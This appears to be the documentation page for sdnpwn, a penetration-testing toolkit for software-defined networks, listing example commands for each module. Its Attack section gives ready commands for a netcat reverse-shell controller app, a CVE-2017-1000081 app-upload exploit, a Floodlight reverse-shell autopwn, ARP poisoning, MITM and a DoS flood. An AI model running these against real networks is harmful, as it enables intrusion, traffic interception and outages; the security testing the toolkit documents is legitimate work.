sdnpwn Toolkit

Get sdnpwn

The latest version of sdnpwn can be found on Github.

Now available on BlackArch Linux!

Getting Started

The basic usage of sdnpwn is like so:

An article introducing sdnpwn and it’s basic usage can be found here.

Module Cheatsheet

Functionality in sdnpwn is separated into different modules. Each module is responsible for a particular attack or action. See below for example usage of each module.

Reconnaissance

• arpmon
  
  ./sdnpwn.py arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0 ./sdnpwn.py arpmon -i eth0 -m map #Map MAC addresses to IP addresses

  1 2	./sdnpwn.py arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0 ./sdnpwn.py arpmon -i eth0 -m map #Map MAC addresses to IP addresses

• sdn-detect
  
  ./sdnpwn.py sdn-detect #Test using default gateway with ARP traffic ./sdnpwn.py sdn-detect -t 192.168.0.29 -m icmp #Test using host 192.168.0.29 using ICMP traffic ./sdnpwn.py sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.

  1 2 3

  ./sdnpwn.py sdn-detect #Test using default gateway with ARP traffic ./sdnpwn.py sdn-detect -t 192.168.0.29 -m icmp #Test using host 192.168.0.29 using ICMP traffic ./sdnpwn.py sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.

• controller-detect
  
  ./sdnpwn.py controller-detect -i eth0 --lldp #Test usign observed LLDP messages at interface eth0 ./sdnpwn.py controller-detect -t 192.168.0.3 #Test NB Inter. of controller at 192.168.0.3

  1 2	./sdnpwn.py controller-detect -i eth0 --lldp #Test usign observed LLDP messages at interface eth0 ./sdnpwn.py controller-detect -t 192.168.0.3 #Test NB Inter. of controller at 192.168.0.3

• of-scan
  
  ./sdnpwn.py of-scan -t 192.168.1.1 #Scan default ports 6633 and 6653 for OpenFlow service ./sdnpwn.py of-scan -t 192.168.1.1 -p 1000-10000 #Scan port range for OpenFlow service

  1 2	./sdnpwn.py of-scan -t 192.168.1.1 #Scan default ports 6633 and 6653 for OpenFlow service ./sdnpwn.py of-scan -t 192.168.1.1 -p 1000-10000 #Scan port range for OpenFlow service

Management

• help
  
  ./sdnpwn.py help #Print sdnpwn help

  1	./sdnpwn.py help #Print sdnpwn help

• mods
  
  ./sdnpwn.py mods #Print a list of all executable modules ./sdnpwn.py mods -s lfa #Search modules for a module with "lfa" in it's name ./sdnpwn.py mods -n new-mod #Create a new module named "new-mod" ./sdnpwn.py mods -r new-mod #Remove module named "new-mod"

  1 2 3 4

  ./sdnpwn.py mods #Print a list of all executable modules ./sdnpwn.py mods -s lfa #Search modules for a module with "lfa" in it's name ./sdnpwn.py mods -n new-mod #Create a new module named "new-mod" ./sdnpwn.py mods -r new-mod #Remove module named "new-mod"

• info
  
  ./sdnpwn.py info test-mod #Print information for module named "test-mod"

  1	./sdnpwn.py info test-mod #Print information for module named "test-mod"

• system
  
  ./sdnpwn.py system ifconfig #Run ifconfig command on the system

  1	./sdnpwn.py system ifconfig #Run ifconfig command on the system

Attack

• lfa-relay
  
  ./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay bridge #Relay LLDP frames between eth0 and eth1 ./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay tunnel \ --tunnel-local 192.168.70.1 --tunnel-remote 192.168.70.2 #Relay LLDP frames through a remote tunnel

  1 2 3

  ./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay bridge #Relay LLDP frames between eth0 and eth1 ./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay tunnel \ --tunnel-local 192.168.70.1 --tunnel-remote 192.168.70.2 #Relay LLDP frames through a remote tunnel

• lfa-scapy
  
  ./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 #Relay LLDP frames between eth0 and eth1 ./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 --script mitm.py #Pass relayed traffic through a custom script

  1 2	./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 #Relay LLDP frames between eth0 and eth1 ./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 --script mitm.py #Pass relayed traffic through a custom script

• lldp-replay
  
  ./sdnpwn.py lldp-replay -i eth0 -w lldpcap.cap #Capture LLDP frame to file lldpcap.cap ./sdnpwn.py lldp-replay -i eth0 -r lldpcap.cap #Replay LLDP frame from file lldpcap.cap

  1 2	./sdnpwn.py lldp-replay -i eth0 -w lldpcap.cap #Capture LLDP frame to file lldpcap.cap ./sdnpwn.py lldp-replay -i eth0 -r lldpcap.cap #Replay LLDP frame from file lldpcap.cap

• host-location-hijack
  
  ./sdnpwn.py host-location-hijack --iface eth0 --target 192.168.56.7 #Hijack location of 192.168.56.7

  1	./sdnpwn.py host-location-hijack --iface eth0 --target 192.168.56.7 #Hijack location of 192.168.56.7

• of-switch
  
  ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf #Connect to controller at 192.168.1.1 on port 6653 using of-switch.conf configuration ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -l 8888 #Open relay proxy on port 8888 ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -o eth0 #Output packet-out payloads to eth0

  1 2 3

  ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf #Connect to controller at 192.168.1.1 on port 6653 using of-switch.conf configuration ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -l 8888 #Open relay proxy on port 8888 ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -o eth0 #Output packet-out payloads to eth0

• of-gen
  
  ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --hello #Send OF Hello message to 192.168.7.8:6633 ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 -c 1000 -d .001 --hello #Flood OF Hello messages ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --packet-in --xid 0 --buffer-id 0 --in-port 1 \ --reason action --total-length 65353 --data-scapy "Ether()/IP()/TCP()" #Send arbitrary packet-in message

  1 2 3 4

  ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --hello #Send OF Hello message to 192.168.7.8:6633 ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 -c 1000 -d .001 --hello #Flood OF Hello messages ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --packet-in --xid 0 --buffer-id 0 --in-port 1 \ --reason action --total-length 65353 --data-scapy "Ether()/IP()/TCP()" #Send arbitrary packet-in message

• onos-app
  
  ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell #Build netcat based reverse shell app from template ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -c #Modify configuration for app before build ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -k #Build app and keep source folder

  1 2 3

  ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell #Build netcat based reverse shell app from template ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -c #Modify configuration for app before build ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -k #Build app and keep source folder

• onos-app-upload
  
  ./sdnpwn.py onos-app-upload -t 192.168.23.100 -p 8181 -a apps/compiled_apps/securearp.oar #Exploit CVE-2017-1000081 to upload app from compiled apps folder

  1	./sdnpwn.py onos-app-upload -t 192.168.23.100 -p 8181 -a apps/compiled_apps/securearp.oar #Exploit CVE-2017-1000081 to upload app from compiled apps folder

• floodlight-debug-autopwn
  
  ./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -l 127.0.0.1:8888 #Set up listener and get reverse shell on port 8888 ./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -r #Do not set up a listener. Use this if you're using another program to listen for the shell

  1 2	./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -l 127.0.0.1:8888 #Set up listener and get reverse shell on port 8888 ./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -r #Do not set up a listener. Use this if you're using another program to listen for the shell

• dp-arp-poison
  
  ./sdnpwn.py dp-arp-poison -i eth0 -v 192.168.1.2 -t 192.168.1.3 -m de:ad:be:ef:ba:11 #Poison 192.168.1.3 in ARP cache of 192.168.1.2 with MAC of de:ad:be:ef:ba:11

  1	./sdnpwn.py dp-arp-poison -i eth0 -v 192.168.1.2 -t 192.168.1.3 -m de:ad:be:ef:ba:11 #Poison 192.168.1.3 in ARP cache of 192.168.1.2 with MAC of de:ad:be:ef:ba:11

• dp-mitm
  
  ./sdnpwn.py dp-mitm --iface eth0 --target1 192.168.1.2 --gateway #MITM connection from target to gateway

  1	./sdnpwn.py dp-mitm --iface eth0 --target1 192.168.1.2 --gateway #MITM connection from target to gateway

• phantom-host-scan
  
  ./sdnpwn.py phantom-host-scan --iface eth0 --target-ip 192.168.1.2 --ports 22,23 --phantom-ip 192.168.1.5 #Scan ports 22 and 23 using the phantom host scan

  1	./sdnpwn.py phantom-host-scan --iface eth0 --target-ip 192.168.1.2 --ports 22,23 --phantom-ip 192.168.1.5 #Scan ports 22 and 23 using the phantom host scan

• phantom-storm
  
  ./sdnpwn.py phantom-storm --iface eth0 --target 192.168.1.0/24 --phantom-ip 192.168.1.5 --packets 1000 #Launch phantom storm DoS attack against network 192.168.1.0/24 with 1000 packets

  1	./sdnpwn.py phantom-storm --iface eth0 --target 192.168.1.0/24 --phantom-ip 192.168.1.5 --packets 1000 #Launch phantom storm DoS attack against network 192.168.1.0/24 with 1000 packets